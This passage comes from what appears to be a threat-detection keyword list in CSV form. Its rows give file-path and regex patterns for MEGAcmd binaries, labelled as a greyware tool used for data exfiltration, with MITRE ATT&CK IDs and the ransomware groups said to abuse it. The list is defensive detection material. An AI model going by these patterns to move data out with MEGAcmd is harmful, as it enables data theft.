EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/MEGAcmdShell.exe*",".{0,1000}\/MEGAcmdShell\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/MEGAcmdUpdater.app*",".{0,1000}\/MEGAcmdUpdater\.app.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/QNAP_NAS/megacmdpkg*",".{0,1000}\/QNAP_NAS\/megacmdpkg.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/upd/mcmd/MEGAcmd.app*",".{0,1000}\/upd\/mcmd\/MEGAcmd\.app.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by 
attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-attr*",".{0,1000}\/usr\/bin\/mega\-attr.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-backup*",".{0,1000}\/usr\/bin\/mega\-backup.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-cancel*",".{0,1000}\/usr\/bin\/mega\-cancel.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*/usr/bin/mega-cat*",".{0,1000}\/usr\/bin\/mega\-cat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-cd*",".{0,1000}\/usr\/bin\/mega\-cd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-cmd*",".{0,1000}\/usr\/bin\/mega\-cmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-cmd*",".{0,1000}\/usr\/bin\/mega\-cmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - 
EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-cmd-server*",".{0,1000}\/usr\/bin\/mega\-cmd\-server.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-confirm*",".{0,1000}\/usr\/bin\/mega\-confirm.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-confirmcancel*",".{0,1000}\/usr\/bin\/mega\-confirmcancel.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-cp*",".{0,1000}\/usr\/bin\/mega\-cp.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA 
(hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-debug*",".{0,1000}\/usr\/bin\/mega\-debug.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-deleteversions*",".{0,1000}\/usr\/bin\/mega\-deleteversions.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-df*",".{0,1000}\/usr\/bin\/mega\-df.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-du*",".{0,1000}\/usr\/bin\/mega\-du.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-errorcode*",".{0,1000}\/usr\/bin\/mega\-errorcode.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-exclude*",".{0,1000}\/usr\/bin\/mega\-exclude.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-exec*",".{0,1000}\/usr\/bin\/mega\-exec.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 
- T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-export*",".{0,1000}\/usr\/bin\/mega\-export.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-find*",".{0,1000}\/usr\/bin\/mega\-find.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-ftp*",".{0,1000}\/usr\/bin\/mega\-ftp.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*/usr/bin/mega-get*",".{0,1000}\/usr\/bin\/mega\-get.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-graphics*",".{0,1000}\/usr\/bin\/mega\-graphics.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-help*",".{0,1000}\/usr\/bin\/mega\-help.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-https*",".{0,1000}\/usr\/bin\/mega\-https.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - 
INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-import*",".{0,1000}\/usr\/bin\/mega\-import.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-invite*",".{0,1000}\/usr\/bin\/mega\-invite.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-ipc*",".{0,1000}\/usr\/bin\/mega\-ipc.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-killsession*",".{0,1000}\/usr\/bin\/mega\-killsession.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA 
(hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-lcd*",".{0,1000}\/usr\/bin\/mega\-lcd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-log*",".{0,1000}\/usr\/bin\/mega\-log.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-login*",".{0,1000}\/usr\/bin\/mega\-login.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*/usr/bin/mega-logout*",".{0,1000}\/usr\/bin\/mega\-logout.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-lpwd*",".{0,1000}\/usr\/bin\/mega\-lpwd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-ls*",".{0,1000}\/usr\/bin\/mega\-ls.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-mediainfo*",".{0,1000}\/usr\/bin\/mega\-mediainfo.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - 
INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-mkdir*",".{0,1000}\/usr\/bin\/mega\-mkdir.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-mount*",".{0,1000}\/usr\/bin\/mega\-mount.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-mv*",".{0,1000}\/usr\/bin\/mega\-mv.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-passwd*",".{0,1000}\/usr\/bin\/mega\-passwd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service 
abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-permissions*",".{0,1000}\/usr\/bin\/mega\-permissions.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-preview*",".{0,1000}\/usr\/bin\/mega\-preview.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-proxy*",".{0,1000}\/usr\/bin\/mega\-proxy.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-put*",".{0,1000}\/usr\/bin\/mega\-put.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-pwd*",".{0,1000}\/usr\/bin\/mega\-pwd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-quit*",".{0,1000}\/usr\/bin\/mega\-quit.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-reload*",".{0,1000}\/usr\/bin\/mega\-reload.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - 
T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-rm*",".{0,1000}\/usr\/bin\/mega\-rm.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*/usr/bin/mega-session*",".{0,1000}\/usr\/bin\/mega\-session.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by 